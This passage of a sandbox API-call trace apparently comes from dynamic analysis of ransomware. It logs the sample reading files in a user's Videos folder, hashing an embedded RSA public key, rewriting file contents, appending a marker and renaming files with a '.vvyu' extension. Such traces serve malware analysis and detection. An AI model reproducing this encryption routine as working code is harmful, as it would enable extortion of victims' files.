hHeap=0x2c0000) returned 1 [0198.434] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x49b7, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x49b7, lpOverlapped=0x0) returned 1 [0198.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0198.435] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x49bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.435] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.437] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.437] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.437] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.437] CloseHandle (hObject=0x584) returned 1 [0198.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0198.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0198.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0198.439] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\DyXmYMfEW2zZ74G.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\dyxmymfew2zz74g.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\DyXmYMfEW2zZ74G.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\dyxmymfew2zz74g.avi.vvyu")) returned 1 [0198.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.441] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0198.445] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8a7ea0, ftCreationTime.dwHighDateTime=0x1d8a459, ftLastAccessTime.dwLowDateTime=0xf0fe2d20, ftLastAccessTime.dwHighDateTime=0x1d8a6c4, ftLastWriteTime.dwLowDateTime=0xf0fe2d20, ftLastWriteTime.dwHighDateTime=0x1d8a6c4, nFileSizeHigh=0x0, nFileSizeLow=0x10502, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L6EhB4OjIlkRcLeaHkH.avi", cAlternateFileName="L6EHB4~1.AVI")) returned 1 [0198.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0198.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.445] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\L6EhB4OjIlkRcLeaHkH.avi") returned=".avi" [0198.445] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\L6EhB4OjIlkRcLeaHkH.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\l6ehb4ojilkrcleahkh.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.446] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=66818) returned 1 [0198.446] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.449] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x104dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.449] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.451] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.451] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x10502, lpOverlapped=0x0) returned 1 [0198.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.453] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0198.454] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.454] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.454] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.454] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.454] GetLastError () returned 0x0 [0198.454] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.454] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0198.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.455] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.455] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.455] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10500) returned 0x2af7168 [0198.456] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeabf0 [0198.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68d8 [0198.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeac38 [0198.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68f0 [0198.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6920 [0198.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6980 [0198.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6938 [0198.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.457] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6980 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6938 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6920 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0198.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.460] GetCurrentThreadId () returned 0x5d8 [0198.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af53c0 [0198.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0198.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.461] GetCurrentThreadId () returned 0x5d8 [0198.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6980 [0198.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6920 [0198.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0198.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6938 [0198.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6908 [0198.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6998 [0198.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0198.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6968 [0198.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6950 [0198.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69b0 [0198.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6950 [0198.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0198.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0198.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6920 [0198.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0198.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.469] HeapFree (in: 